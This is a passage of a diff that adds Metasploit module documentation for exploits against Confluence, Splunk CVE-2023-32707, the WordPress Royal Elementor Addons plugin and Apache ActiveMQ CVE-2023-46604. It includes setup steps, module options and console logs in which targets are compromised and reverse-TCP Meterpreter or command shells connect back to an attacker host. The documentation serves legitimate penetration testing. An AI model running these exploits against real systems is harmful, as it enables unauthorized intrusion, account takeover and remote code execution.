[*] Sending stage (57692 bytes) to 192.168.86.50
|
||||
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.50:56898) at 2023-10-16 20:41:57 +0100
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: WIN-V28QNSO2H05$
|
||||
meterpreter > sysinfo
|
||||
Computer : WIN-V28QNSO2H05
|
||||
OS : Windows Server 2022 10.0 (amd64)
|
||||
Architecture : x64
|
||||
System Language : en_IE
|
||||
Meterpreter : java/windows
|
||||
meterpreter > pwd
|
||||
C:\Program Files\Atlassian\Confluence
|
||||
meterpreter >
|
||||
```
|
||||
@@ -0,0 +1,108 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a
|
||||
Confluence instance administrator account. Using this account, an attacker can then perform all
|
||||
administrative actions that are available to Confluence instance administrator. This module uses the
|
||||
administrator account to install a malicious .jsp servlet plugin which the user can trigger to gain code
|
||||
execution on the target in the context of the of the user running the confluence server.
|
||||
|
||||
### Setup
|
||||
Download and install a [vulnerable version of Atlassian Confluence](https://www.atlassian.com/software/confluence/download.).
|
||||
By default the server will listen for HTTP connections on port 8090. This exploit module was tested against Confluence
|
||||
8.5.1 running on Windows Server 2022.
|
||||
|
||||
After running the installer the setup wizard will ask for a trial license. An Atlassian account is free and required
|
||||
to obtain the trial licence. A database and a will also be required to run Confluence. Download and install
|
||||
[PostgreSQL](https://www.enterprisedb.com/downloads/postgres-postgresql-downloads). The setup Wizard will ask for DB
|
||||
credentials, the default PostgreSQL database can be used.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
1. Do: `use atlassian_confluence_unauth_backup`
|
||||
1. Set the `RHOST`
|
||||
1. Run the module
|
||||
1. Receive a Meterpreter session in the context of the user running the Confluence application.
|
||||
|
||||
## Options
|
||||
|
||||
### CONFLUENCE_TARGET_ENDPOINT
|
||||
|
||||
This is the endpoint used to trigger the vulnerability, and must be reachable by an un authenticated HTTP(S) POST
|
||||
request. The three vulnerable endpoints outlined by Atlassian in the advisory for this vulnerability are as follows:
|
||||
- /json/setup-restore.action
|
||||
- /json/setup-restore-local.action
|
||||
- /json/setup-restore-progress.action'
|
||||
|
||||
### CONFLUENCE_PLUGIN_TIMEOUT
|
||||
|
||||
The exploit will install a malicious plugin into the Confluence server. Plugin installation is performed asynchronously
|
||||
and we must poll the server to find out when installation has completed. This option governs the maximum amount
|
||||
of time to wait for installation to complete. The timeout value is in seconds and by default this option is set to `30`.
|
||||
|
||||
## Scenarios
|
||||
### Windows Server 2022 running Atlassian Confluence 8.5.1
|
||||
```
|
||||
msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > set rhost 172.16.199.134
|
||||
rhost => 172.16.199.134
|
||||
msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > set verbose true
|
||||
verbose => true
|
||||
msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > options
|
||||
|
||||
Module options (exploit/multi/http/atlassian_confluence_unauth_backup):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CONFLUENCE_PLUGIN_TIMEOUT 30 yes The timeout (in seconds) to wait when installing a plugin
|
||||
CONFLUENCE_TARGET_ENDPOINT /json/setup-restore.action yes The endpoint used to trigger the vulnerability. (Accepted: /json/setup-restore.action, /json/setup-restore-local.action, /json/setup-restore-progress.action)
|
||||
NEW_PASSWORD LELTtnOG yes Password to be used when creating a new user with admin privileges
|
||||
NEW_USERNAME candace.leffler yes Username to be used when creating a new user with admin privileges
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 172.16.199.134 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 8090 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (java/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 172.16.199.1 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Java
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.199.1:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable. Exploitable version of Confluence: 8.5.1
|
||||
[*] Setting credentials: candace.leffler:LELTtnOG
|
||||
[+] Exploit Success! Login Using 'candace.leffler :: LELTtnOG'
|
||||
[*] Generating payload plugin
|
||||
[*] Uploading payload plugin
|
||||
[*] Triggering payload plugin
|
||||
[*] Deleting plugin...
|
||||
[*] Sending stage (57692 bytes) to 172.16.199.134
|
||||
[*] Meterpreter session 6 opened (172.16.199.1:4444 -> 172.16.199.134:50095) at 2023-12-11 18:52:33 -0500
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: WIN-2EEL7BRDUD8$
|
||||
meterpreter > sysinfo
|
||||
Computer : WIN-2EEL7BRDUD8
|
||||
OS : Windows Server 2022 10.0 (amd64)
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Meterpreter : java/windows
|
||||
meterpreter >
|
||||
```
|
||||
+200
@@ -0,0 +1,200 @@
|
||||
## Vulnerable Application
|
||||
|
||||
### Description
|
||||
|
||||
An authorization issue within Splunk Enterprise allows any user with the edit_user capability to take over
|
||||
the admin account (or any other chosen account) by simply changing its password.
|
||||
|
||||
On June 1, 2023, Splunk released a software update that addressed this vulnerability (CVE-2023-32707).
|
||||
|
||||
The following products are affected:
|
||||
|
||||
Splunk Enterprise:
|
||||
- from 8.1 before 8.1.14
|
||||
- from 8.2 before 8.2.11
|
||||
- from 9.0 before 9.0.5
|
||||
|
||||
Splunk Cloud Platform:
|
||||
- before 9.0.2303.100
|
||||
|
||||
### Exploitation
|
||||
|
||||
This module exploits this authorization issue to take over the admin account (or any other account with
|
||||
the capability `install_apps`) to deploy an app within Splunk, aiming to achieve remote code execution.
|
||||
|
||||
To achieve that this module:
|
||||
- Will change the password of the targeted user;
|
||||
- Will deploy an app with a malicious payload;
|
||||
|
||||
After the execution the cleanup method will be called and:
|
||||
- Should delete the deployed app;
|
||||
|
||||
### Setup
|
||||
|
||||
Create a Splunk's docker container with the following command:
|
||||
|
||||
```bash
|
||||
docker run --rm -p 8000:8000 -p 8089:8089 -e "SPLUNK_START_ARGS=--accept-license" -e "SPLUNK_PASSWORD=password" --name splunk-9.0.4 splunk/splunk:9.0.4
|
||||
```
|
||||
|
||||
```bash
|
||||
# Creating non-admin user
|
||||
$ curl -k -u admin:password https://localhost:8089/services/authentication/users -d name=redway -d password=changeme -d roles=user -d createrole=1 -X POST
|
||||
# Adding capability to edit_user to the non-admin role
|
||||
$ curl -k -u admin:password https://localhost:8089/services/authorization/roles/user-redway -d capabilities=edit_user -X POST
|
||||
```
|
||||
|
||||
**One must log in at least once on the web interface (http://localhost:8000). Otherwise, this module will fail to get the CSRF
|
||||
token on the `appinstall`.**
|
||||
|
||||
## Verification Steps
|
||||
Follow [Setup](#setup) and [Scenarios](#scenarios).
|
||||
|
||||
## Options
|
||||
|
||||
### USERNAME (required)
|
||||
|
||||
The username that with the capability `edit_user` to authenticate with.
|
||||
|
||||
### PASSWORD (required)
|
||||
|
||||
The password of the user to authenticate with.
|
||||
|
||||
### RHOSTS (required)
|
||||
|
||||
The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
|
||||
### RPORT (required)
|
||||
|
||||
The target port (TCP)
|
||||
|
||||
### TARGET_USER (required)
|
||||
|
||||
The username to change the password for (default: admin)
|
||||
|
||||
### TARGET_PASSWORD
|
||||
|
||||
The new password to set for the admin user (default: random)
|
||||
|
||||
### APP_NAME
|
||||
|
||||
The name of the app to upload (default: random)
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Docker container running Splunk 9.0.4
|
||||
|
||||
|
||||
If the user you have access doen't have the capability `edit_user` the module will fail as shown below:
|
||||
|
||||
```
|
||||
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > check
|
||||
|
||||
[*] Splunk version 9.0.4 detected
|
||||
[*] 127.0.0.1:8000 - The target is not exploitable. User 'redway' does not have 'edit_user' capability
|
||||
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) >
|
||||
|
||||
```
|
||||
|
||||
If the targeted user does have the capability `install_apps` the module will fail as shown below:
|
||||
|
||||
```
|
||||
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 172.17.0.1:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Splunk version 9.0.4 detected
|
||||
[+] The target appears to be vulnerable. User 'redway' has 'edit_user' capability
|
||||
[*] Changing 'user' password to yMDIOKyrHoUx
|
||||
[+] Password of the user 'user' has bee changed to yMDIOKyrHoUx
|
||||
[-] Exploit aborted due to failure: bad-config: The user 'user' does not have 'install_app' capability. You may consider to target other user
|
||||
[*] Exploit completed, but no session was created.
|
||||
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) >
|
||||
```
|
||||
|
||||
```
|
||||
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > options
|
||||
|
||||
Module options (exploit/multi/http/splunk_privilege_escalation_cve_2023_32707):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
APP_NAME no The name of the app to upload (default: random)
|
||||
PASSWORD changeme yes The password for the specified username
|
||||
Proxies http:127.0.0.1:8080 no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 127.0.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 8000 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
TARGET_PASSWORD no The new password to set for the admin user (default: random)
|
||||
TARGET_USER admin yes The username to change the password for (default: admin)
|
||||
USERNAME redway yes The username with "edit_user" role to authenticate as
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (cmd/unix/reverse_python):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 172.17.0.1 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
SHELL /bin/sh yes The system shell to use
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Splunk <= 9.0.5, 8.2.11, and 8.1.14 / Linux
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 172.17.0.1:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Splunk version 9.0.4 detected
|
||||
[+] The target appears to be vulnerable. User 'redway' has 'edit_user' capability
|
||||
[*] Changing 'admin' password to srviInIpi
|
||||
[+] Password of the user 'admin' has bee changed to srviInIpi
|
||||
[*] Uploading app stringtough
|
||||
[*] Uploading file stringtough
|
||||
[*] Creating an application package named: stringtough
|
||||
[+] stringtough successfully uploaded
|
||||
[*] Waiting for session
|
||||
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:52672) at 2023-09-12 15:19:53 +0200
|
||||
|
||||
id
|
||||
uid=41812(splunk) gid=41812(splunk) groups=41812(splunk),999(ansible)
|
||||
pwd
|
||||
/opt/splunk/etc/apps/stringtough/bin
|
||||
exit
|
||||
[*] 127.0.0.1 - Command shell session 1 closed.
|
||||
```
|
||||
|
||||
### Docker container running Splunk 9.0.5
|
||||
|
||||
On a **non-vulnerable** version the module will fail as shown below:
|
||||
|
||||
```
|
||||
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 172.17.0.1:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[!] The target is not exploitable. Detected Splunk version 9.0.5 which is not vulnerable ForceExploit is enabled, proceeding with exploitation.
|
||||
[*] Changing 'admin' password to iDKBmVsj
|
||||
[-] Exploit aborted due to failure: unexpected-reply: Unable to change admin's password.
|
||||
[*] Exploit completed, but no session was created.
|
||||
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > set ForceExploit true
|
||||
ForceExploit => true
|
||||
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 172.17.0.1:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[!] The target is not exploitable. Detected Splunk version 9.0.5 which is not vulnerable ForceExploit is enabled, proceeding with exploitation.
|
||||
[*] Changing 'admin' password to scupUXtcV
|
||||
[-] Exploit aborted due to failure: unexpected-reply: Unable to change admin's password.
|
||||
[*] Exploit completed, but no session was created.
|
||||
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) >
|
||||
```
|
||||
@@ -0,0 +1,208 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This Metasploit module exploits a Remote Code Execution vulnerability in WordPress Royal Elementor Addons and Templates
|
||||
plugin, versions prior to 1.3.79.
|
||||
The vulnerability is due to an unauthenticated file upload flaw in the plugin.
|
||||
To replicate a vulnerable environment for testing:
|
||||
|
||||
1. Install WordPress.
|
||||
2. Download and install the Royal Elementor Addons and Templates plugin, ensuring the version is below 1.3.79.
|
||||
3. Activate Royal Elementor Templates Kit and chose a theme.
|
||||
4. Verify that the plugin is activated and accessible on the local network.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Set up a WordPress instance with the Royal Elementor Addons plugin (version < 1.3.79).
|
||||
2. Launch `msfconsole` in your Metasploit framework.
|
||||
3. Use the module: `use exploit/multi/http/wp_royal_elementor_addons_rce`.
|
||||
4. Set `RHOSTS` to the local IP address or hostname of the target.
|
||||
5. Configure necessary options such as `TARGETURI`, `SSL`, and `RPORT`.
|
||||
6. Execute the exploit using the `run` or `exploit` command.
|
||||
7. If the target is vulnerable, the module will execute the specified payload.
|
||||
|
||||
## Options
|
||||
|
||||
This module offers several options:
|
||||
|
||||
### TARGETURI
|
||||
|
||||
- **Description**: Base path of the WordPress application.
|
||||
- **Required**: Yes.
|
||||
- **Default Value**: `/`.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Successful Exploitation Against Local WordPress with Royal Elementor Addons 1.3.78
|
||||
|
||||
**Setup**:
|
||||
|
||||
- Local WordPress instance with Royal Elementor Addons version 1.3.78.
|
||||
- Metasploit Framework.
|
||||
|
||||
**Steps**:
|
||||
|
||||
1. Start `msfconsole`.
|
||||
2. Load the module:
|
||||
```
|
||||
use exploit/multi/http/wp_royal_elementor_addons_rce
|
||||
```
|
||||
4. Set `RHOSTS` to the local IP (e.g., 192.168.1.10).
|
||||
5. Configure other necessary options (TARGETURI, SSL, etc.).
|
||||
6. Launch the exploit:
|
||||
```
|
||||
exploit
|
||||
```
|
||||
|
||||
**Expected Results**:
|
||||
|
||||
- The module attempts to retrieve a nonce from the local server.
|
||||
- It then uploads and executes the payload.
|
||||
- If successful, control over the local WordPress instance is gained, depending on the payload used.
|
||||
|
||||
**Example**:
|
||||
|
||||
With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
|
||||
|
||||
```
|
||||
msf6 > search royal
|
||||
|
||||
Matching Modules
|
||||
================
|
||||
|
||||
# Name Disclosure Date Rank Check Description
|
||||
- ---- --------------- ---- ----- -----------
|
||||
0 exploit/multi/http/wp_royal_elementor_addons_rce 2023-11-23 excellent Yes WordPress Royal Elementor Addons RCE
|
||||
|
||||
|
||||
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/wp_royal_elementor_addons_rce
|
||||
|
||||
msf6 > use 0
|
||||
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > options
|
||||
|
||||
Module options (exploit/multi/http/wp_royal_elementor_addons_rce):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metaspl
|
||||
oit.html
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
||||
TARGETURI / yes The base path to the wordpress application
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILENAME VaXEJJxCKI no Name to use on remote system when storing payload; cannot contain spaces.
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain spaces.
|
||||
LHOST 192.168.1.5 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Automatic
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > set rhosts chocapikk.lab
|
||||
rhosts => chocapikk.lab
|
||||
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > set rport 8888
|
||||
rport => 8888
|
||||
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > set ssl false
|
||||
[!] Changing the SSL option's value may require changing RPORT!
|
||||
ssl => false
|
||||
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.1.5:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] WordPress Version: 6.4.1
|
||||
[+] Detected Royal Elementor Addons version: 1.3.78
|
||||
[+] The target appears to be vulnerable.
|
||||
[*] Attempting to retrieve nonce...
|
||||
[+] Nonce found in response: "9e10e80ee1"
|
||||
[*] Sending payload
|
||||
[+] Payload uploaded successfully
|
||||
[*] Triggering the payload
|
||||
[*] Sending stage (3045380 bytes) to 172.20.0.3
|
||||
[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 172.20.0.3:46556) at 2023-11-28 08:27:43 +0100
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : 172.20.0.3
|
||||
OS : Debian 11.8 (Linux 6.4.10-060410-generic)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
```
|
||||
|
||||
With `php/meterpreter/reverse_tcp`:
|
||||
|
||||
```
|
||||
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > options
|
||||
|
||||
Module options (exploit/multi/http/wp_royal_elementor_addons_rce):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS chocapikk.lab yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metaspl
|
||||
oit.html
|
||||
RPORT 8888 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
TARGETURI / yes The base path to the wordpress application
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (php/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 192.168.1.5 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Automatic
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.1.5:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] WordPress Version: 6.4.1
|
||||
[+] Detected Royal Elementor Addons version: 1.3.78
|
||||
[+] The target appears to be vulnerable.
|
||||
[*] Attempting to retrieve nonce...
|
||||
[+] Nonce found in response: "9e10e80ee1"
|
||||
[*] Sending payload
|
||||
[+] Payload uploaded successfully
|
||||
[*] Triggering the payload
|
||||
[*] Sending stage (39927 bytes) to 172.20.0.3
|
||||
[*] Meterpreter session 2 opened (192.168.1.5:4444 -> 172.20.0.3:40952) at 2023-11-28 08:30:35 +0100
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : 541828095fba
|
||||
OS : Linux 541828095fba 6.4.10-060410-generic #202308111154 SMP PREEMPT_DYNAMIC Fri Aug 11 12:00:45 UTC 2023 x86_64
|
||||
Meterpreter : php/linux
|
||||
meterpreter > getuid
|
||||
Server username: www-data
|
||||
```
|
||||
@@ -0,0 +1,287 @@
|
||||
## Vulnerable Application
|
||||
This module exploits a deserialization vulnerability in the OpenWire transport unmarshaller in Apache ActiveMQ.
|
||||
Affected versions include 5.18.0 through to 5.18.2, 5.17.0 through to 5.17.5, 5.16.0 through to 5.16.6, and all
|
||||
versions before 5.15.16.
|
||||
|
||||
For a full technical analysis of the vulnerability read the
|
||||
[Rapid7 AttackerKB Analysis](https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis).
|
||||
|
||||
## Testing
|
||||
|
||||
### Linux
|
||||
* The official [Getting Started](https://activemq.apache.org/getting-started) documentation has a full walkthrough.
|
||||
* You will need to install Java if you have not already done so.
|
||||
* Download a vulnerable version of ActiveMQ, e.g. [apache-activemq-5.18.2-bin.tar.gz](https://www.apache.org/dyn/closer.cgi?filename=/activemq/5.18.2/apache-activemq-5.18.2-bin.tar.gz&action=download)
|
||||
* Extract the contents: `tar zxvf apache-activemq-5.18.2-bin.tar.gz`
|
||||
* Change into the ActiveMQ directory: `cd apache-activemq-5.18.2/bin/`
|
||||
* Run ActiveMQ in the foreground: `./activemq console`
|
||||
|
||||
## Verification Steps
|
||||
Note: Disable Defender if you are using the default payloads on a Windows target.
|
||||
|
||||
Steps (Linux target):
|
||||
1. Start msfconsole
|
||||
2. `use exploit/multi/misc/apache_activemq_rce_cve_2023_46604`
|
||||
3. `set RHOST <LINUX_TARGET_IP>`
|
||||
4. `set SRVHOST eth0`
|
||||
5. `set target 1`
|
||||
6. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
|
||||
7. `check`
|
||||
8. `exploit`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Windows
|
||||
```
|
||||
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > show options
|
||||
|
||||
Module options (exploit/multi/misc/apache_activemq_rce_cve_2023_46604):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CHOST no The local client address
|
||||
CPORT no The local client port
|
||||
Proxies no A proxy chain of format type:host:port[
|
||||
,type:host:port][...]
|
||||
RHOSTS 192.168.86.50 yes The target host(s), see https://docs.me
|
||||
tasploit.com/docs/using-metasploit/basi
|
||||
cs/using-metasploit.html
|
||||
RPORT 61616 yes The target port (TCP)
|
||||
SRVHOST 192.168.86.42 yes The local host or network interface to
|
||||
listen on. This must be an address on t
|
||||
he local machine or 0.0.0.0 to listen o
|
||||
n all addresses.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
SSLCert no Path to a custom SSL certificate (defau
|
||||
lt is randomly generated)
|
||||
URIPATH no The URI to use for this exploit (defaul
|
||||
t is random)
|
||||
|
||||
|
||||
Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
EXITFUNC process yes Exit technique (Accepted: '',
|
||||
seh, thread, process, none)
|
||||
FETCH_COMMAND CERTUTIL yes Command to fetch payload (Acc
|
||||
epted: CURL, TFTP, CERTUTIL)
|
||||
FETCH_DELETE false yes Attempt to delete the binary
|
||||
after execution
|
||||
FETCH_FILENAME ainzysikAU no Name to use on remote system
|
||||
when storing payload; cannot
|
||||
contain spaces.
|
||||
FETCH_SRVHOST no Local IP to use for serving p
|
||||
ayload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving
|
||||
payload
|
||||
FETCH_URIPATH no Local URI to use for serving
|
||||
payload
|
||||
FETCH_WRITABLE_DI %TEMP% yes Remote writable dir to store
|
||||
R payload; cannot contain space
|
||||
s.
|
||||
LHOST 192.168.86.42 yes The listen address (an interf
|
||||
ace may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Windows
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > check
|
||||
[*] 192.168.86.50:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.15.3
|
||||
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.86.42:4444
|
||||
[*] 192.168.86.50:61616 - Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] 192.168.86.50:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.15.3
|
||||
[*] 192.168.86.50:61616 - Using URL: http://192.168.86.42:8080/4ORmILKzvCrowHQ
|
||||
[*] 192.168.86.50:61616 - Sent ClassPathXmlApplicationContext configuration file.
|
||||
[*] 192.168.86.50:61616 - Sent ClassPathXmlApplicationContext configuration file.
|
||||
[*] Sending stage (200774 bytes) to 192.168.86.50
|
||||
[*] Meterpreter session 2 opened (192.168.86.42:4444 -> 192.168.86.50:51975) at 2023-11-02 10:15:14 +0000
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: WIN-V28QNSO2H05\Administrator
|
||||
meterpreter > pwd
|
||||
C:\apache-activemq-5.15.3\bin
|
||||
meterpreter > sysinfo
|
||||
Computer : WIN-V28QNSO2H05
|
||||
OS : Windows 2016+ (10.0 Build 20348).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 1
|
||||
Meterpreter : x64/windows
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
### Linux
|
||||
|
||||
```
|
||||
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > show options
|
||||
|
||||
Module options (exploit/multi/misc/apache_activemq_rce_cve_2023_46604):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CHOST no The local client address
|
||||
CPORT no The local client port
|
||||
Proxies no A proxy chain of format type:host:port[
|
||||
,type:host:port][...]
|
||||
RHOSTS 192.168.86.43 yes The target host(s), see https://docs.me
|
||||
tasploit.com/docs/using-metasploit/basi
|
||||
cs/using-metasploit.html
|
||||
RPORT 61616 yes The target port (TCP)
|
||||
SRVHOST 192.168.86.42 yes The local host or network interface to
|
||||
listen on. This must be an address on t
|
||||
he local machine or 0.0.0.0 to listen o
|
||||
n all addresses.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
SSLCert no Path to a custom SSL certificate (defau
|
||||
lt is randomly generated)
|
||||
URIPATH no The URI to use for this exploit (defaul
|
||||
t is random)
|
||||
|
||||
|
||||
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Acc
|
||||
epted: CURL, FTP, TFTP, TNFTP
|
||||
, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary
|
||||
after execution
|
||||
FETCH_FILENAME baCcDlijxJN no Name to use on remote system
|
||||
when storing payload; cannot
|
||||
contain spaces.
|
||||
FETCH_SRVHOST no Local IP to use for serving p
|
||||
ayload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving
|
||||
payload
|
||||
FETCH_URIPATH no Local URI to use for serving
|
||||
payload
|
||||
FETCH_WRITABLE_DI yes Remote writable dir to store
|
||||
R payload; cannot contain space
|
||||
s.
|
||||
LHOST 192.168.86.42 yes The listen address (an interf
|
||||
ace may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
1 Linux
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > check
|
||||
[*] 192.168.86.43:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.18.2
|
||||
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.86.42:4444
|
||||
[*] 192.168.86.43:61616 - Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] 192.168.86.43:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.18.2
|
||||
[*] 192.168.86.43:61616 - Using URL: http://192.168.86.42:8080/Fn51CApi
|
||||
